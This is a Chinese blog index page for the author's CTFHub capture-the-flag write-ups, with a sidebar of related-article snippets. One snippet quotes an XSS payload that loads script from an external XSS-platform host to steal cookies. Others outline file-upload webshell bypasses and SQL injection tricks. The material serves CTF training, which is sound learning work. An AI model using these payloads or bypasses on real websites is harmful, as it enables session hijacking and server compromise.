CTF之旅(CTFHub技能树+详细Write up+持续更新ing)(首页)

最新推荐文章于 2023-11-28 16:03:36 发布
最新推荐文章于 2023-11-28 16:03:36 发布
阅读量6.3k 收藏 24
点赞数 8
分类专栏: CTF 文章标签: 安全 web 1024程序员节
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51563603/article/details/120927483
版权

CTFHub题目WriteUP地址

本来不想分段的,但是后来发现要写的东西太多了,就写了个首页,汇总一下地址,大家见谅

1.web前置技能(已完结)
2.信息泄露(已完结)
3.密码口令+XSS(已完结)
4.SQL注入(已完结)
5.文件上传(已完结)
6.RCE(已完结)

前言

这里收录了我在CTFHub中做的题目和自己写的一些想法,首先我想稍微讲下个人经历,本人在今年寒假的时候初识CTF
,当时还在攻防世界上做了一些题目,但是后来有人跟我说攻防世界的题目比较老,建议我换个网站(这边没有诋毁攻
防世界的意思,每个人有每个人的想法),后来也因为学业较忙且基础太差无法开展此方面的学习,直到到了暑假,我
自学完了一些编程语言包括Python、Java等,网页的前后端知识也有所了解后,我继续在学长推荐的CTFHub上了我的
CTF之旅。

本人还是属于CTF小白,此文章也引用了一些大佬的资料,希望大家能够共同进步,废话不多说开始看 Write Up 吧!

注:CTFHub采用的是动态flag,我这道题的flag对了不代表你再复制进去也对哦!所以请不要偷懒,认真滴自己解决吧!

接下去可以根据地址去康康我写的WP吧!

迷失的蓝色小恐龙
关注
  • 8
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfhub技能树web,我的头条面试经历分享
2401_83739503的博客
04-03 934
也是bp抓包,修改refer的值,再进行注入题目说了过滤空格,那么就可以用注释的方法绕过,如/**/??????因为是无验证,所以直接写一个的php文件上传就好了,然后蚁剑连接,得到flag将文件名改成1.jpg然后bp抓包进行上传,在bp里将后缀改回php,蚁剑连接即可先上传一个.htaccess文件,内容如下:这样当前目录下的所有文件都会被当初php来解析然后再上传1.jpg,蚁剑连接上传1.php用bp抓包,将文件类型也就是Content-Type修改为image/jpeg。
ctf xss注入.pdf
最新发布
02-11
ctf xss注入
反射型xss攻击流量数据包
07-18
反射型xss攻击流量数据包
xss注入讲解ppt.pptx
08-10
三种xss基础知识的讲解
ctf-browser-visitor:Bot访客服务,应对CTF中的XSS挑战
05-04
ctf浏览器访问者 Bot访问者应对CTF中的XSS挑战 http://127.0.0.1:5000/visit?job={"url":"url_to_visit","cookies":{"key":"value"}}
CTF技能树,为初学者的一个认识ctf
10-22
ctf的一个树状图而已
ctfhub-技能树-xss题集全部习题详解-最新
weixin_73562787的博客
08-10 3177
结合</textarea>'"><script src=http://xsscom.com//He7bc3></script>构成上面源码部分闭合符合条件,可以删掉</textarea>'">不影响。分析一下,代码意思是 从当前页面的URL中获取查询字符串(URL的get参数),如果参数名为"jumpto",则将页面重定向到参数值所指定的URL。然后再复制url,把它复制到第二个框框发送,在我们的xss平台的项目中就会显示刚刚的数据包的信息,在cookie中发现了flag。
CTFHUB技能树详解(最全、最细、最易懂)
it_wzb的博客
09-29 4817
最近闲的无聊,玩玩CTF吧,并把自己的解题思路分享给大家。大佬多指教。
CTFHub XSS DOM跳转 WriteUp
柠檬i的博客
07-05 2012
跳转 XSS 的攻击方式涉及将恶意脚本嵌入到跳转链接或重定向 URL 中,以便在用户点击该链接或重定向时触发脚本的执行。攻击者可以利用跳转 XSS 攻击来进行会话劫持、盗取用户信息、篡改页面内容等恶意活动。 为了防止跳转 XSS 攻击,开发人员应该对用户输入的数据进行适当的验证、过滤和转义,以确保在将其嵌入到页面中之前进行正确的处理。此外,安全的编程实践和使用安全的开发框架也是防止跳转 XSS 的关键。
ctfhub之xss
小宇的web博客
05-22 1624
ctfhub之xss 1.我接触使用过三个XSS平台 1.脚本非常丰富:http://www.1oad.com 2.简约:https://xsspt.com 3.非常好用,自带模块成功获取到了内网ip(上面两个都没有成功):https://xsshs.cn 所以我这个文章也是简单的说说如何使用XSS平台,以第三个平台为例说明; 解题流程 1.先在上面的what’s your name 输入JavaScript语句,发现出错只能使用xss平台在下面的对话框中进行xss漏洞注入。 这里先注册一下xss测试平
题解记录-CTFHub技能树|Web|XSS,文件上传
weixin_57448435的博客
09-15 771
xss平台使用,修改后缀名、文件头、双写绕过,%00截断,.htaccess文件理解,bp与蚁剑工具的使用
XSSPawn:XSSPawn是一种灵活且可自定义的访客bot,用于设置CTF挑战; 主要用作CTF XSS Bot。 它基于CTFTraining的base_image_xssbot
04-08
XSSPawn XSSPawn是一种灵活且可自定义的访客bot,用于CTF(主要是XSS)挑战设置。 从精湛的分支 建于 高山的 Chrome 木偶核心 Express.js 怎么运行的 XSSPawn是基于触发器的,由Express驱动的服务,它依赖于HTTP请求通信。 为了使XSSPawn访问某个URL,某人需要将带有JSON编码数据的HTTP POST请求(如下所示)发送到/visit端点。 "{"url":"http://<domain>/<some>"}" 收到数据后,XSSPawn将产生Chromium无头浏览器并访问指定的URL。 入门 通常,僵尸程序的访问功能无需任何预先配置即可直接使用。 但是,如果您想编写自己的方案(例如,设置自定义cookie,执行重定向,设置HTTP请求标头),则可以通过提供自己的scenario.js文件
ctf+web安全+任意文件上传+任意文件下载
10-08
ctf+web安全+任意文件上传+任意文件下载
CTF安恒周周练1-9题+解析.zip
10-10
CTF安恒周周练1-9题+解析.zip
ctfhub web全部做题记录(持续跟新)
01-08
信息泄露 ...url = http://challenge-c93f188d4781b829.sandbox.ctfhub.com:10080/ a = ['web','website','backup','back','www','wwwroot','temp'] b = ['tar','tar.gz','zip','rar'] for i in a: fo
【HackPack CTFWEB——持续更新
12-21
题目地址 ...打开是酱紫 sui便打开一个404找不到 先演示错误思路: Plan A.... 上bp抓包,Ctrl + I,爆破点为/后的数字比如1,sniper狙击手模式, ...playload 用runtime file ...换思路,找宝藏,要想有地图,hi
ctfhub技能树_web_web前置技能_HTTP
YanLucyqi的博客
11-28 1870
POST请求可能会导致新的资源的建立和/或已有资源的修改。重定向的返回码3XX说明。(7)点击Repeater,修改target(其中Host为网址的ip地址,Port为网址的端口号),并将内容粘贴进Request的Raw去。(7)点击Repeater,修改target(其中Host为网址的ip地址,Port为网址的端口号),并将内容粘贴进Request的Raw去。(7)点击Repeater,修改target(其中Host为网址的ip地址,Port为网址的端口号),并将内容粘贴进Request的Raw去。
报错注入常见函数原理
p_utao的博客
11-04 632
floor函数 select count(*),(floor(rand(0)*2))x from table group by x; select查询语句 group by进行分组(相同为一组) rand()生成0到1的随机数 floor()返回整数 count()对数据整合(类似去重) 产生原因:mysql在执行该语句会建立一个虚拟表,表中有两个字段(一个是分组的值和一个计数的值),当分组已经存在后就会爆错。 参考:http://www.cnblogs.com/sfriend/p/11365999.ht
CTFhub 报错注入
plant1234的博客
06-16 221
报错注入: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schemata sc
ctfhub技能树xss
07-28
CTFHub技能树中有关于XSS(跨站脚本攻击)的内容。XSS是一种常见的Web安全漏洞,攻击者通过注入恶意脚本来攻击用户浏览器,从而窃取用户信息或者进行其他恶意操作。在CTFHub的XSS技能树中,你可以学习到以下内容: 1. XSS基础知识:了解XSS的概念、分类和原理。 2. XSS攻击类型:学习常见的XSS攻击类型,包括反射型、存储型和DOM型XSS。 3. XSS攻击场景:了解XSS攻击在不同的Web应用场景中的实践方法,如评论框、搜索框等。 4. XSS防御措施:学习如何预防和防御XSS攻击,包括输入过滤、输出编码和内容安全策略等。 5. XSS挑战与实战:通过CTF题目和实际场景模拟,提升对XSS漏洞的发现和利用能力。 请注意,这只是CTFHub技能树中关于XSS的一部分内容,更详细的内容需要你自己去学习和探索。祝你学习愉快!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值